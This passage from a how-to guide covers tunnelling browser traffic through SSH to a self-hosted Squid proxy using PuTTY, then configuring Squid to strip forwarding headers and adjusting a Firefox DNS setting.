5. Open your browser and change the proxy setting to 127.0.0.1:8080 for all protocols.  In Firefox this is in Options -> Advanced -> Network -> Settings

6. Attempt to open a web site. You should be able to browse like normal.

7. Congrats! You are now browsing inside an encrypted tunnel!

Part 2c: Windows Client PuTTy Method

1. From a remote site verify you have internet connectivity.

2. Install Putty using the Windows installer from http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

3. Open up PuTTyGen and import your newuserkey.pem private key file.

4. Save the new PuTTy formatted key by clicking Save Private Key. You can ignore the prompt about not passwording the file.  It will now have a PPK extension and look like newuserkey.ppk

5. Open the main PuTTy program and type or paste in the server’s DNS name or IP and correct the port number to the one you set SSHD to.

6. In the left-side menu select SSH and then Auth to get to the SSH Authorization section.  Click browse next to Private Key File For Authentication and select your newuserkey.ppk file.

7. At the bottom of the window type in a name for the config and click Save and then Connect to test the connection.

8. If that succeeds disconnect (just type exit) and reopen PuTTy.

9. Once PuTTy is open select your saved config and click on Load.

10. Now that your config is loaded use the left-side menu to select SSH and then tunnels

11. Type in 8080 in the source port and for destination use 127.0.0.1:3128 and click Add.

12. Click on Session at the top of the menu and click Save to save your updated config.

13. Click on connect to start a new SSH connection to the server.

14. Open your browser and change the proxy setting to 127.0.0.1:8080 for all protocols.  In Firefox this is in Options -> Advanced -> Network -> Settings

15. Attempt to open a web site. You should be able to browse like normal.

16. Congrats! You are now browsing inside an encrypted tunnel!

 

Part 3:  Hide the proxy flags (optional)

1. Open your Squid config file for editing (Example: nano /etc/squid/squid.conf) and add the following lines to the bottom:

Squid 2.x:

via off
follow_x_forwarded_for deny all
forwarded_for delete
request_header_access From deny all
request_header_access Server deny all
request_header_access WWW-Authenticate deny all
request_header_access Link deny all

Squid 3.x:

via off
forwarded_for delete
request_header_access X-Forwarded-For deny all
request_header_access From deny all
request_header_access Server deny all
request_header_access WWW-Authenticate deny all
request_header_access Link deny all

 

Part 4:  Extra Firefox Settings (all clients)

1. Open up Firefox and in the URL bar type in about:config

2. Find the setting network.proxy.socks_remote_dns and change the value to true.  Note that this preference only applies to SOCKS proxies: with the HTTP proxy configured in Part 2, Firefox already hands the full URL to Squid and does not resolve the site’s name locally, so the setting is harmless there and matters only if you later switch the tunnel to a SOCKS proxy.

 
